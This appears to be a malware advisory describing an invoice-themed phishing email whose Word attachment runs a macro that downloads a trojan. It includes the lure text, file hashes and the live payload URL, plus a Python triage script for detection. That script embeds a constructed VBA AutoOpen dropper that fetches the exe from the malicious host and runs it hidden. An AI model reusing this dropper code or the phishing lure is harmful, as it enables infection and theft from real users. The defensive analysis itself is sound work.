New Word malware: Documentation: Your Order Ref: SGM249/013


MX Lab, http://www.mxlab.eu, has started intercepting a new malware distribution campaign spread by email with the subject “Documentation: Your Order Ref: SGM249/013”.

The email is sent from the spoofed address “Jonathan Carroll <Jonathan@john-s-shackleton.co.uk>” (the From: header is forged, so the sending domain itself is not an indicator) and has the following body:

Your Order: SGM249/013
Our Order: 345522
Advice Note: 355187
Despatch Date: 22/12/15

Attachments:
s547369.DOC Shackleton Invoice Number 355187

John S. Shackleton (Sheffield) Ltd
4 Downgate Drive
Sheffield
S4 8BU

Tel: 0114 244 4767
Fax: 0114 242 5965

E-mail: sales@john-s-shackleton.co.uk
Web: www.johnsshackleton.co.uk

Phone us for a free stock brochure.

Our product range includes: Beams, Columns, Pfc’s, Channels, Flats, Rounds, Squares, Angles, Tees, Convex, ERW Tubes, Hollow Section, Cold Reduced Sheet, Hot Rolled Sheet Galvanised Sheet, Zintec Sheet, Floorplate, Open Mesh Flooring, Handrail Standards, Tube, Tubeclamps. Welded Mesh, Expanded Metal, Perforated Sheet, U Edging, Fencing and Bright Bar.

IMPORTANT NOTE

Our Terms and Conditions of Sale apply to all quotations and the supply of all goods. Copies of our Terms and Conditions of Sale are available on request or can be found on our website www.johnsshackleton.co.uk . These Terms and Conditions include a provision (see term 12) that title to goods supplied shall not pass to a customer until payment is received by us in full for all goods supplied. We only accept orders for the supply of goods on the basis our Terms and Conditions of Sale apply.

The attached file s547369.DOC is a Word document with an embedded malicious macro.

The document is detected as HEUR.VBA.Trojan, Trojan:W97M/MaliciousMacro.GEN or heur.macro.download.cc by 4 of the 54 AV engines at VirusTotal.

See VirusTotal or Malwr for more detailed information.
SHA256: a3d10e08999093b212be81c3294c0e4dbb90a9a5783179c1158b6fe20af15ed2

When the macro runs, it downloads the second-stage payload from wattplus.net/98g654d/4567gh98.exe.

The file 4567gh98.exe is detected as Trojan.Win32.Injector.cdgy (v), PE:Malware.Obscure!1.9C59 [F] or UDS:DangerousObject.Multi.Generic by 6 of the 55 AV engines at VirusTotal.

See VirusTotal or Malwr for more detailed information.
SHA256: 4985218139506968b541187195a7612ed6da398c88a8ba124201820a617d7d25
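As an added example (this is not MX Lab's tooling, and the post does not reproduce the macro's real source), here is a small Python triage helper for a campaign like this one. It matches file hashes against the two SHA256 indicators above, and scans macro source (as extracted with a tool such as oletools' olevba) for download-and-execute indicators, joining split string literals before looking for URLs and defanging whatever it finds. The VBA text embedded in it is a constructed stand-in; only the host wattplus.net and the two hashes come from the post.

```python
"""Offline triage helpers for a macro-dropper campaign: hash matching against
the IOCs from the write-up, plus a crude scan of extracted VBA source for
download-and-execute indicators. Added example, not MX Lab's own tooling."""
import hashlib
import re

# Hashes and host published in the write-up above.
IOC_SHA256 = {
    "a3d10e08999093b212be81c3294c0e4dbb90a9a5783179c1158b6fe20af15ed2": "s547369.DOC (Word dropper)",
    "4985218139506968b541187195a7612ed6da398c88a8ba124201820a617d7d25": "4567gh98.exe (downloaded payload)",
}
IOC_HOSTS = {"wattplus.net"}

# Generic download-and-execute indicators; the sample's real macro is not on the page.
SUSPICIOUS_VBA = (
    "AutoOpen", "Document_Open", "URLDownloadToFile", "MSXML2.XMLHTTP",
    "WinHttp.WinHttpRequest", "ADODB.Stream", "WScript.Shell", "Shell",
    "Environ(", "SaveToFile",
)

# Two URL shapes: with a scheme, or a bare host followed by a path.
URL_RE = re.compile(r'(?i)(https?://[^\s"\']+|(?:[a-z0-9-]+\.)+[a-z]{2,}/[^\s"\']+)')
# "abc" & "def"   or   "abc" & _ <newline> "def"   ->   "abcdef"
CONCAT_RE = re.compile(r'"\s*&\s*(?:_\s*)?"')


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def lookup_hash(sha256: str):
    """Return the IOC label for a known hash, else None."""
    return IOC_SHA256.get(sha256.lower())


def match_file(data: bytes):
    return lookup_hash(sha256_hex(data))


def defang(url: str) -> str:
    """Make a URL safe to paste into a report: http->hxxp, host dots bracketed."""
    scheme, rest = "", url
    m = re.match(r"(?i)(https?://)(.*)", url)
    if m:
        scheme, rest = m.group(1).replace("http", "hxxp"), m.group(2)
    host, sep, path = rest.partition("/")
    return scheme + host.replace(".", "[.]") + sep + path


def host_of(url: str) -> str:
    return re.sub(r"(?i)^https?://", "", url).partition("/")[0].lower()


def extract_urls(vba: str):
    """Join split string literals first; macro authors split URLs to dodge scanners."""
    joined = CONCAT_RE.sub("", vba)
    return [m.group(1) for m in URL_RE.finditer(joined)]


def triage_vba(vba: str) -> dict:
    urls = extract_urls(vba)
    hits = [kw for kw in SUSPICIOUS_VBA if kw.lower() in vba.lower()]
    return {
        "urls": [defang(u) for u in urls],
        "known_host": any(host_of(u) in IOC_HOSTS for u in urls),
        "indicators": hits,
        # A URL plus at least two execution/download primitives is worth a human look.
        "suspicious": bool(urls) and len(hits) >= 2,
    }


# Constructed stand-in for an extracted macro; NOT the real s547369.DOC code.
SAMPLE_VBA = '''Sub AutoOpen()
    Dim u As String
    u = "wattplus.net/98g654d/" & _
        "4567gh98.exe"
    Dim p As String
    p = Environ("TEMP") & "\\svc.exe"
    Dim x As Object
    Set x = CreateObject("MSXML2.XMLHTTP")
    x.Open "GET", "http://" & u, False
    x.Send
    Dim s As Object
    Set s = CreateObject("ADODB.Stream")
    s.Open
    s.Write x.responseBody
    s.SaveToFile p, 2
    Shell p, vbHide
End Sub
'''

if __name__ == "__main__":
    print(triage_vba(SAMPLE_VBA))
    print(match_file(b"placeholder bytes") or "hash not in IOC list")
```

Run it on the VBA that olevba dumps from the .DOC (olevba s547369.DOC) rather than on the stand-in; the keyword list is deliberately generic, so treat the "suspicious" flag as a triage hint, not a verdict.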
